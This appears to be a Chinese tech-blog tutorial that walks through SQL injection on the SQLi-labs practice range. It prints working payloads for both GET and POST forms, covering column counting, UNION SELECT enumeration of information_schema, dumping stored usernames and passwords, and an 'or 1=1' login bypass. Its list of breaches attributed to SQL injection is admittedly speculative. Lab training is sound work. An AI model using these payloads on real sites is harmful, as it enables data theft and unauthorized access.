你们公司的网站真的安全吗?快用我的SQL注入脚本测试下吧。

于 2024-08-13 11:31:48 发布
阅读量922 收藏 25
点赞数 23
分类专栏: 软件测试 安全测试 文章标签: web安全 测试工具 系统安全 测试覆盖率 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ningmengban/article/details/141159850
版权


1. 2020年招商银行数据泄露事件

  • 事件概述:2020年,有消息称招商银行的用户数据在暗网中被公开售卖,涉及大量用户的个人信息和银行账户数据。
  • 原因:虽然具体细节未被官方披露,但据业内分析,此次事件可能与招商银行某些业务系统的SQL注入漏洞有关。攻击者通过SQL注入手段获取了数据库中的敏感信息。

2. 2018年华住集团数据泄露事件

  • 事件概述:华住集团旗下多个酒店的开房记录、个人身份信息、注册资料等超过5亿条数据在暗网上被售卖。
  • 原因:虽然官方没有确认具体的技术细节,但有专家指出,此类大规模数据泄露通常可能与系统存在的SQL注入漏洞等安全缺陷有关。

3. 2017年饿了么平台数据泄露事件

  • 事件概述:2017年,饿了么外卖平台的用户数据在暗网中被出售,涉及大量用户的个人信息。
  • 原因:业内推测此次数据泄露可能与存在SQL注入漏洞有关。饿了么官方未具体披露技术原因,但SQL注入攻击是此类平台常见的安全问题。

4. 2023年某省份教育系统数据泄露

  • 事件概述:2023年,某省份教育系统发生数据泄露事件,学生的个人信息、成绩单等数据被泄露到网上。
  • 原因:虽然具体技术原因未被公开,但有分析认为,SQL注入可能是导致数据泄露的原因之一,因为许多教育系统的安全防护往往较为薄弱,容易被利用。


SQL注入(SQL Injection)是一种常见且危险的漏洞类型,攻击者可以通过这种漏洞获取数据库中的敏感信息,甚至对数据库进行增删改查操作。在国内发生的多起重大数据泄露事件中,SQL注入漏洞往往是攻击者入侵系统并获取数据的主要手段之一。

SQL注入原理可描述为通过用户可控参数中注入SQL语法,在程序员未对输入数据合法性做判断或过滤不严情况下,破坏原有SQL结构,达到编写程序时意料之外的结果。上篇文章已经搭建好了SQLi-labs靶场,一共包含65关,适用于GET和POST场景。接下来让我们开始SQL注入实战!


一、实战准备


安全测试靶场:SQLi-labs


工具:Firefox、Firefox插件HackBar、burpsuite或任意抓包工具


二、SQL注入思路


1、判断是否存在SQL注入漏洞

2、猜解SQL查询语句中的字段数

3、获取当前数据库

4、获取数据库中的表

5、获取表中的字段名

6、获取指定字段的数据


三、SQL注入实战-Get场景


进入SQLi-labs的Less-1关,输入id的值


1、id=1' ,发起请求,返回SQL语法错误


2a7dafa220e45dc67881d6e6db0b572f.jpeg


2、id = 1'--+;程序未对输入内容做限制, 语句执行成功,页面返回了id=1的用户信息,存在SQL注入漏洞


3442ef90ce06202fd578393d1e386f68.jpeg


3、判断当前表的字段数


select * from users where id='1' order by 1; 该语句中order by 1为按第1列的数据进行排序。


输入 id=1' order by 3 #,回显数据正常,表示当前查询表存在第3列数据。


fb0fa277077fdf4d7b18c1947021098e.jpeg


输入 id=1' order by 4 #,报错!不存在第4列,说明当前查询的用户表数据一共只有3列!


231dfb2053879f96444a4e43ea1d1041.jpeg


4、获取数据库库名


使用union联合查询,让union前面的select语句查询为空,然后采用后面的select语句查询并输出。


id=' union select 1,2,group_concat(schema_name) from information_schema.schemata #; 可回显所有的数据库库名。


d954f132c3aac5948a496137502f0bdc.jpeg


5、获取数据库的表名


id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #;获取到security库的所有表名。


8a7fd62465e0604ad250d31f3bd550bd.jpeg


6、获取表中的字段名


id=' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #;其中,如果不支持'users'单引号,可转为十六进制,7573657273为users的十六进制。得到users表的所有字段。


d14219303d85dc6b9e1c6d3fb2f5d4b2.jpeg


7、获取表中需要的数据


id=' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users #;


可以得到users表中所有用户和密码信息。其中7e是~的十六进制表示。


128407710bbca8425c62f8a4ee57f236.jpeg


四、SQL注入实战-POST场景


进入SQLi-labs的Less-11关,输入Username、Password。


1、判断是否存在sql注入漏洞


在username中填写’,password中随便写,出现sql语法错误。或者通过bp截获到请求信息,uname=’ & passwd=1&submit=Submit。


e1c591a6768acb887bcfe92d109a288a.jpeg


直接在username中填写admin’or 1=1#,password随便写,此时登录成功,Username存在SQL注入漏洞。Password同理。


56beeaf9b859995f5fd16c71b400e4aa.jpeg


2、判断当前查询表的字段数


通过burpsuite截获数据(用任意抓包工具都可),并发送到Repeater,修改数据并进行重发:


ce4f6c7998fb2e4ff28f3dfefe169f6b.jpeg


在burpsuite中分别修改数据,进行后续步骤的操作:


uname=admin’order by 3#&passwd=a&submit=Submit 或者是使用uname=admin&passwd=a’order by 2# &submit=Submit 同样可以进行判断,最后得出一共有两列。


7e9376497e2f944930619db861e90758.jpeg


b100140d0fe29b7a6066b3b78b3b6830.jpeg


3、获取当前数据库名


uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。


f136fa7f34d758e5cbb421bfb0b1f227.jpeg


4、获取当前数据库下的表名


uname=a' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='security')# &passwd=a&submit=Submit可以得到security数据库中所有的表信息


88e5ca1a5331aa01a905e25511c7650d.jpeg


5、获取表中字段名


uname=a%27 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=a&submit=Submit 可以得到users表所有字段值信息,为id,username、password


4a6d16e6cfe2a9477b586a491dfbaf85.jpeg


6、获取表中数据


uname=a%27 union select 1,group_concat(concat_ws('~',username,password)) from security.users#&passwd=a&submit=Submit,可以得到users表所有用户及密码信息。


fe6d024a0eb522a3c5c83dfd6452fd38.jpeg


当然,以上基于sqli-labs的注入实操只是入门级,感兴趣的同学可以继续钻研其他关卡!


学无止境,行以致远!

另外请大家注意,未经授权允许,不要随意去第三方网站(包括不限于别人的网站,政府门户网站...)去做安全测试哈,所有展开的安全测试行为都应严格遵循相关的网络安全法。

ningmengban
关注
专栏目录
博客
提升 UI 自动化技能,找工作必备的20个实战技巧!测试工程师必看!
09-10 1136
UI自动化测试作为保障产品质量、提升测试效率的有效手段,一直以来在很多公司的项目中都有非常多的落地实践,然而因为UI应用涉及到很多复杂的场景、不稳定的问题导致落地效果不佳。本文将会讲解20个实际会遇到的UI自动化测试问题,并提供有效的解决方案,帮助大家在面试中可以更好从容的回答面试官的问题。这样可以在同一套测试逻辑下,执行不同的数据集,覆盖更多测试场景。:根据测试的优先级,将测试用例分为不同的级别(如Smoke Test、Regression Test),优先执行最重要的测试,以便快速得到关键反馈。
博客
银行项目:信用卡业务及测试,一文搞定!
09-06 503
大部分的银行测试主要业务测试为主,且银行测试岗大多为外包,岗位是比较容易被替代的。随着金融市场的不断变化和银行业务的复杂化,测试工作的难度也在不断增加,对于测试人员的技能要求也在不断提高,掌握自动化测试、性能测试、安全测试等专业技能成趋势,也更有助于在银行测试领域获得更多且更高薪的就业机会。有需要的点击下方名片找我领取哦。还有各种简历模板、大厂面试真题等着大家,千万不要错过。需要完整项目跟项目源码的关注并私信我关键词“项目”自行获取,文末公众号也可领取。
博客
校招全流程干货分享,秋招别内耗
09-05 761
昨天一个学弟跟我抱怨最近校招没几家有反馈特别难受,都不敢投递了,觉得自己没准备好,我真的想说,太没必要了,秋招千万不能内耗,只会消磨自己,还不好拿到offer,给大家分享一下我是怎么过来的,焦虑是难免的,但是还是有一些方法的,希望这些经验能帮助到你们。bg:23届,毕业后一直在水滴,对,就是大家应该都熟悉的水滴筹的公司,其实水滴还有很多其他业务,我就是在水滴保做商业分析,水滴保在互联网保险经纪赛道也属于龙头业务了。
博客
什么是精准测试?为什么要做精准测试?
08-30 958
例如,在一个包含数百万行代码的系统中,如果采用全量测试的方法,每次代码更新后都需要对整个系统进行测试,这不仅需要耗费大量的时间和资源,而且测试结果往往无法及时反馈给开发团队,导致开发周期拉长,进而影响产品的发布速度。如果订单服务的代码进行了修改,传统的全量测试方法可能会对整个系统进行测试,然而精准测试则可以通过分析订单服务与其他服务的依赖关系,仅对受影响的支付服务进行测试,从而大幅减少测试时间和资源消耗。通过影响分析,测试工程师能够优先测试那些受改动影响较大的模块,从而提高测试的针对性和有效性。
博客
功能 & 接口测试,详解从抓包 +linux 日志 + 数据库的 bug 定位!
08-27 470
如何定位?1)抓包分析:因为是web项目,这里通过浏览器开发者工具F12进行分析。找到网络视图,当点击提交时,无请求信息,问题出在前端!2)前端有报错提示,点开报错,可以看到原因:TypeError: files is undefined。也就是提交操作时,files文件未定义。结合当前功能业务思考哪个环节需要提交文件。3)返回功能操作上一步,发现图片文件未上传。该功能需要优化:当前必填红色* 标注,且当用户必填未填时,弹框给与提示。
博客
微服务架构 RPC 接口到底是什么?如何测试?
08-23 691
微服务通常分布在不同的网络节点上,RPC接口使得一个服务可以像调用本地方法一样调用另一个远程服务的方法,比如当服务A需要调用服务B的功能时,服务A可以通过RPC接口向服务B发送请求并等待响应。RPC接口在现代软件架构中提供了一个灵活且强大的工具,特别是在分布式系统和微服务架构中,它能有效地简化服务之间的通信,支持跨平台、跨语言的调用,使得开发者能够更专注于业务逻辑,而不必过多关注底层通信的细节。在分布式系统中,多个服务可能部署在不同的服务器上,RPC接口使得这些服务可以像调用本地方法一样进行互相通信。
博客
一文掌握 Web 测试:功能、界面、兼容与安全的综合测试指南!
08-19 812
随着Web技术的不断演进,测试除了对应用的功能性、界面美观性、跨平台兼容性的基本要求外、安全性和性能的要求也逐步增高。因此,全面、系统的测试思维和策略成为了保证Web应用高质量的关键因素。本篇文章将从功能测试、界面测试、兼容性测试和安全测试四个方面,深入梳理测试要点,确保Web应用在各个层面上都能满足用户和业务的需求。通过这篇文章,希望对于构建全面测试思维,提供一些帮助。
博客
UI 自动化分布式测试 -Docker Selenium Grid
08-16 866
Docker 和 Selenium Grid 的结合为分布式 UI 自动化测试提供了一种高效、可扩展且易于管理的方法。通过使用 Docker 容器化技术,测试环境的设置和配置变得更加简便和一致;而 Selenium Grid 则允许在多个节点上并行运行分布式测试,从而大大提升测试的速度和覆盖范围。
博客
以搜索为例,从功能,到抓取接口,实现 Jmeter 接口自动化思路详解
08-15 830
不论是用工具去实现接口测试;还是用Python或Java去实现自动化测试,都是基于功能测试思路去实现。在追求更高效的工具、代码测试过程中,不要忘记了最为本质的测试思维能力的提升!本篇文章从功能入手,到自动化测试实现,带你一步步领略测试思维的重要性!
博客
性能测试常见的内存溢出问题: JVM 内存溢出如何调优?
08-14 469
针对java项目做性能测试的时候,很多同学都见过一个报错,就是OOM【Out Of MemoryError】;那出现这种报错就是项目发生了内存溢出的问题,这是比较严重的性能问题。所以,作为一个性能测试工程师,我们要能够分析JVM内存的问题以及理解其中的原理,才能更好的给JVM内存出现的性能瓶颈问题进行调优。
博客
2024虾皮测开一面+二面+hr面面经
08-14 606
(他的面试链接里面有牛客那种可以写代码的地方,之前主要做测试,代码能力倒退的不止一点。4,这个项目主要做什么,怎么做的,怎么测的,过程,内容,流程。请提前测试好音频,我服了,进去的时候没问题,和面试官开始面试之后,我的音频就没声音,最后是戴耳机解决的。然后我很快给出了第二个答案,如果有lastname这个玩意,让它=我的姓,但我感觉他不是想考这个。12,前公司的自动化测试平台自研项目我是如何使用的,底层代码框架知道不,用的什么框架?6,代码题:给定字符串,不论大小写,统计文中出现的字符个数,语言不限。
博客
不得不掌握的性能测试监控神器 -nmon 工具详解
08-12 906
跟我们性能相关的数据是第二列和第三列:发送和接受的报文的多少,还跟网卡的处理上限和带宽的上限的关系,取他们的最小值【短板】跟我们发送和接受的数据做比对,判断网络就是否成为了性能瓶颈了。1)c:进入nmon界面输入小写的c,就可以看到cpu的统计信息,会包括详细信息如下:用户态 系统态 等待io的CPU和空闲占的CPU情况;我们可以通过./nmon -h 进入完整的帮助手册,可以看到详细的所有的命令参数。Network I/O部分:显示接受和发送的包的大小,接受和发送的包的个数,接受和发送包的尺寸等信息。
博客
企业级资源监控方案落地:Prometheus+Grafana+Export
08-09 487
我们有高很多的Linux的命令可以去监控各种资源,比如top,vmstat,iostat,pidstat等,但是命令使用有一定的门槛,结果看起来也没那么直观,所以现在很多公司都用Prometheus+grafana+export方案来进行资源监控。1、数据源的配置出现连接不上问题,报错连接失败:基本上是服务启动的问题或者prometheus的配置文件的问题,可以检查一下;你想用 Prometheus监控平台,去监控其他的服务, 可以去找服务对应的 exporter,按照安装说明,进行配置。
博客
Jmeter+influxdb+grafana 性能测试结果监控
08-07 883
我们做性能测试的时候使用Jmeter自身的监听器统计压测结果虽然可以统计到各个维度的信息,比如TPS,RT,Err等,但是这个Jmeter本身的监控没有办法做存储,也没有办法去找历史数据,所以如果想要持久化储存数据,我们就需要采用监控平台+ influxdb时序数据库进行性能测试结果的监控。
博客
12年磨一剑:软件测试老兵的十条生存法则
08-06 267
对于测试经理来说,建立完善的性能测试和监控流程,并定期进行性能优化和评估,是提升系统性能和用户体验的重要手段。掌握自动化测试、CI/CD、AI/ML等新技术,提升安全测试、性能测试等关键能力,拓宽技术视野,注重软技能的培养,是保持竞争力的关键。此外,作为管理,测试经理还需要关注团队的整体发展和绩效,建立有效的激励机制和反馈机制,鼓励团队成员不断进步和创新。在现代软件开发环境中,测试团队的作用越来越重要,测试经理需要通过有效的管理和领导,提升团队的技术水平和工作效率,为软件质量和用户体验保驾护航。
博客
性能测试瓶颈:CPU 问题的深度分析和调优
08-02 610
CPU 性能问题的深度分析和调优
博客
银行项目信用卡业务及测试,一文搞定。
07-30 293
随着金融市场的不断变化和银行业务的复杂化,测试工作的难度也在不断增加,对于测试人员的技能要求也在不断提高,掌握自动化测试、性能测试、安全测试等专业技能成趋势,也更有助于在银行测试领域获得更多且更高薪的就业机会。还款成功之后检查剩余金额以及应还的利息计算是否正确:剩余应还的账单金额=账单应还的金额-已还金额(最低)。统计的账单为:11月3日,12月3日,下1年的1月3日,2月3日的消费金额以及利息费用的总金额;检查最低还款金额的正确性,例如:设置的最低还款金额为应还金额的10%,应还金额*10%
博客
30天练完这些软件测试项目,面试拿下7offer
07-11 725
请求地址:http://127.0.0.1:8099/api/departments/?请求地址:http://127.0.0.1:8099/api/departments/?请求地址:http://127.0.0.1:8099/api/departments/?请求地址:http://127.0.0.1:8099/api/departments/?(注:$master_name_list:为参数名称;请求地址:http://127.0.0.1:8099/api/departments/T02/
博客
软件测试面试必杀篇:【2024软件测试面试八股文宝典】
05-30 913
800道软件测试面试真题,高清打印版打包带走,横扫软件测试面试高频问题,涵盖测试理论、Linux、MySQL、Web测试、接口测试、App测试、Python、Selenium、性能测试、LordRunner、计算机网络、数据结构与算法、逻辑思维、人力资源等模块面试题,命中率杠杠的,绝对是测试人的福音,面试者的最强武器。PS:加上参考答案有几十万字,答案就没有全部放上来了,高清打印版本超过400多页,留言直接获取。
博客
5 步轻松上手,教你从 0 到 1 落地 Jmeter 接口自动化脚本!
01-16 467
通过以上5步,就可以0代码实现Jmeter自动化脚本的基础开发。当然实际工作中的项目会存在很多需处理的业务场景,比如文件上传处理、关联到数据库的接口处理、接口加密传参处理、数据库断言处理等等,那么就需要大家具备更高阶技术、甚至是自己写代码去解决。学无止境,行以致远。更多软件测试学习资料可点击下方公众号链接领取。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值